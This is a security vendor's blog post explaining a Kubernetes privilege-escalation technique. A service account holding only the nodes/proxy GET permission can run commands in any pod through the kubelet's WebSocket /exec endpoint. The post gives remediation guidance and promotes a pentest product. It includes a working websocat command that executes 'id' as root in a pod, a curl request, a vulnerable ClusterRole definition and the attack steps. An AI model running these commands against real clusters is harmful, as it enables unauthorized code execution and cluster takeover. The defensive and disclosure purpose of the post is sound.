Written by Daniel Limanowski and Adam Brown, Senior Attack Engineers at Horizon3.ai.
Kubernetes was supposed to make running containers at scale boring. Instead, it turned “just give the monitoring agent read-only access” into a stealthy path to execute code in every pod on a node, and in many clusters, that effectively means “own everything.”
In this post we’ll walk through the Kubernetes (K8s) nodes/proxy GET remote code execution (RCE) technique originally detailed by security researcher Graham Helton, explain why K8s maintainers have effectively classified it as “working as intended,” and show how we’ve built full coverage for it into the NodeZero® Kubernetes Pentest so you can see exactly which service accounts in your clusters can be turned into shells.
We’ll close with concrete remediation guidance, including how to use KEP‑2862 and vendor RBAC updates to start digging out of this hole even though the underlying behavior is here to stay.
Kubernetes is an orchestration layer for containers. It schedules pods onto nodes, keeps them running, and exposes APIs for managing workloads, networking, and storage.
Each node runs a kubelet process that actually talks to the container runtime. The kubelet exposes its own HTTP(S) API for metrics, logs, and control operations like /exec and /run. Access to that API is gated by Kubernetes Role-Based Access Control (RBAC), usually via higher‑level resources like nodes/proxy that sit in front of the kubelet.
In theory, you give “read‑only” service accounts just enough access to pull metrics and logs. In practice, for nodes/proxy, “read‑only” is doing a lot of work.
nodes/proxy GET to RCE on Any PodResearch shows that a service account with the nodes/proxy GET permission and network access to the kubelet API can execute arbitrary commands in any pod on reachable nodes (including privileged system pods and control plane workloads) by abusing how the kubelet authorizes WebSocket connections to /exec.
Cluster admins and vendors commonly grant nodes/proxy GET so that agents can:
These interactions look and feel like classic read-only operations. Vendors ship the permissions in Helm charts by default: public code repository scans turned up at least 69 widely used charts that provision nodes/proxy permissions, including stacks like Prometheus, Grafana, Datadog, and Elastic.
That’s rather unsurprising as “read” roles are everywhere, especially with monitoring tools. The problem is what happens when you combine nodes/proxy GET with WebSockets and the kubelet’s /exec endpoint.
At a high level, the attack looks like this:
nodes/proxy GET permission.https://$NODE_IP:10250./pods./exec on the kubelet and bypass the expected CREATE verb check.The key bug is how the kubelet translates HTTP/WebSocket semantics into RBAC verbs for authorization.
The nodes/proxy resource is unusual in Kubernetes RBAC. Instead of mapping to a single operation, it’s a catch‑all gate in front of the kubelet API, with two main paths:
https://$APISERVER/api/v1/nodes/$NODE_NAME/proxy/...https://$NODE_IP:10250/...pods/exec audit logs (only subjectaccessreviews), and rely on the kubelet’s own authz mapping.For traditional HTTP requests, both the API server and kubelet follow the documented mapping of HTTP methods to RBAC verbs: POST → create, GET → get, etc.
Command execution in pods is supposed to require CREATE on pods/exec (or, in this case, nodes/proxy). A POST to /exec via the API server proxy path is correctly mapped to CREATE and denied if the caller only has GET:
curl -sk -X POST \
-H "Authorization: Bearer $TOKEN" \
"$APISERVER/api/v1/nodes/$NODE_NAME/proxy/exec/default/nginx/nginx?command=id&stdout=true"
# => 403 Forbidden: cannot create resource "nodes/proxy"
But interactive exec over WebSockets works differently:
Connection: Upgrade headers to establish the tunnel, even though the underlying operation is a write (command execution).get, and maps the path /exec/ to the proxy subresource, yielding an authz record of “can this user get nodes/proxy?”.nodes/proxy GET, the authorization check passes.At that point, the attacker can execute any command over the WebSocket in the target container:
websocat \
--insecure \
--header "Authorization: Bearer $TOKEN" \
--protocol "v4.channel.k8s.io" \
"wss://$NODE_IP:10250/exec/default/nginx/nginx?output=1&error=1&command=id"
# uid=0(root) gid=0(wheel) groups=0(wheel)...
# {"metadata":{},"status":"Success"}
nodes/proxy GET is widely granted to monitoring, logging, and observability agents: Prometheus, Datadog, Grafana, OpenTelemetry, New Relic, Wiz, and many others.
10250 and has nodes/proxy GET, they can execute code in any pod on that node, including control plane components and privileged system pods like kube-proxy, leading to full cluster compromise./exec operations do NOT show up as pods/exec in audit logs; you only see the subjectaccessreviews checks, which makes this significantly stealthier than the API-server proxy path.This is the kind of “read‑only” permission that attackers quietly celebrate and infrastructure teams inherit for years to come.
Researcher Graham Helton reported this issue through the Kubernetes HackerOne program. The Kubernetes Security Team triaged it, discussed it with SIG‑Auth and SIG‑Node, and ultimately closed it as:
“Won’t Fix (Working as Intended)” and decided it would not receive a CVE.
Their reasoning:
KEP‑2862 introduces new, finer‑grained kubelet subresources like:
| Permission | Endpoints (examples) | Use case |
|---|---|---|
| nodes/metrics | /metrics, /metrics/cadvisor, /metrics/… | Metrics collection |
| nodes/stats | /stats, /stats/summary | Resource statistics |
| nodes/log | /logs/ | Node logs |
| nodes/healthz | /healthz, /healthz/ping, /healthz/syncloop | Health checks |
| nodes/pods | /pods, /runningpods | Pod listing/status |
The goal is to give monitoring agents an alternative to the coarse‑grained nodes/proxy permission, so that over time, nodes/proxy can be deprecated for those use cases.
But there are three important caveats:
/exec, /run, /attach, or /portforward. Any workload that legitimately needs those still has to use nodes/proxy. nodes/proxy GET remains.The Kubernetes Security Team is candid about this, however: they see KEP‑2862 as the way to render nodes/proxy obsolete for monitoring agents, not as a fix for the underlying authz behavior.
In summary, nodes/proxy GET with kubelet access is going to be a dangerous combination for the foreseeable future. The only realistic mitigation path is to restrict usage of nodes/proxy for read‑only use cases.
nodes/proxy GET in Your ClusterFrom an attacker’s perspective, the bar is low. To exploit this behavior, they need:
nodes/proxy GETA minimal vulnerable Role/ClusterRole looks like:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: nodes-proxy-reader
rules:
- apiGroups: [""]
resources: ["nodes/proxy"]
verbs: ["get"]
Any service account bound to this role is in scope.
https://$NODE_IP:10250A Kubeconfig committed to Git, SSRF into a pod, or command injection in an app container can turn into an attacker running commands as the service account. From there, they:
/pods on the kubelet to enumerate all pods and containers on the node./exec/$NAMESPACE/$POD/$CONTAINER?...&command=... and run arbitrary commands across pods.
nodes/proxy GET autonomously.nodes/proxy GET into a First-Class WeaknessWe are introducing this vulnerability as a new first‑class weakness in NodeZero’s Kubernetes Pentest operation, tracked as H3‑2026‑0002.
At a high level, this allows NodeZero to automatically find, safely exploit, and report this weakness if it appears in your cluster.
nodes/proxy GET exploitability leveraging credentials it finds in the pentest environment.From a user’s perspective, this behavior is now just part of a normal Kubernetes Pentest:
Our Kubernetes documentation already recommends that you use the pentest to simulate realistic footholds, not just a privileged admin account:
Under Kubernetes Settings for a Kubernetes Pentest, you can specify a namespace and a service account.
Example scenarios:
In both scenarios, the new nodes/proxy GET RCE module gives you a clear answer to:
“If an attacker compromises this pod or service account, how far can they push kubelet?”
Beyond the initial foothold identity, our Kubernetes pentest already does quite a bit with service accounts:
All of those identities flow into the graph as credentials, triggering the nodes/proxy GET RCE check to test for vulnerable permissions.
Because Kubernetes maintainers are not planning to patch this behavior directly, security teams have to treat nodes/proxy GET as a high‑risk execution capability and harden around it.
KEP-2862 won’t reach GA in April 2026 so keep an eye on it and upgrade clusters when you can. Until then, here’s a set of actions you can take today:
nodes/proxy GETThe priority is to remove the privileged nodes/proxy GET permission from any service account that doesn’t strictly need full Kubelet API access.
ClusterRole or Role that grants get verbs on the nodes/proxy resource.
nodes/proxy for multi-purpose operational accounts that hold other sensitive rights.ClusterRole or Role) that grant nodes/proxy permissions to unauthorized subjects. This prevents accidental re-introduction of the vulnerability.RBAC is necessary but not sufficient. Restrict network access to the Kubelet API as a critical second line of defense.
https://$NODE_IP:10250 using Network Policies, cloud firewalls, or other network controls.10250.nodes/proxy GET in the future.10250 originating from application or non-system namespaces.As researcher Helton notes, this weakness feels a lot like Kerberoasting in Active Directory: architecturally “by design,” widely deployed, and abusable for years.
Even with careful RBAC and eventual KEP‑2862 adoption, new clusters, namespaces, and agents get added all the time. You need something that continuously exercises these paths the way an adversary would, not just a static policy document.
That’s exactly what we’ve built into NodeZero’s Kubernetes Pentest: a recurring, cluster‑wide, attacker‑style assessment of Kubelet and RBAC behavior, including this nodes/proxy GET RCE.
If your Kubernetes environment:
nodes/proxy GET permission10250…then you should assume this weakness is in play until you’ve proven otherwise.
With our latest update, NodeZero’s Kubernetes Pentest can automatically:
nodes/proxy GET permission/exec path against the kubelet
nodes/proxy GET weakness if found exploitable in your environment, including actionable remediation recommendations.If you’re responsible for Kubernetes security, this is one of those Trust but verify moments.
Run a NodeZero Kubernetes Pentest against your clusters, ideally from the same namespaces and service accounts your monitoring agents use, and find out which of your “read‑only” identities can actually run code across pods. Then use the remediation steps above to start turning those paths off before an attacker finds them for you.
If you’re interested in seeing a demo, you can request one here.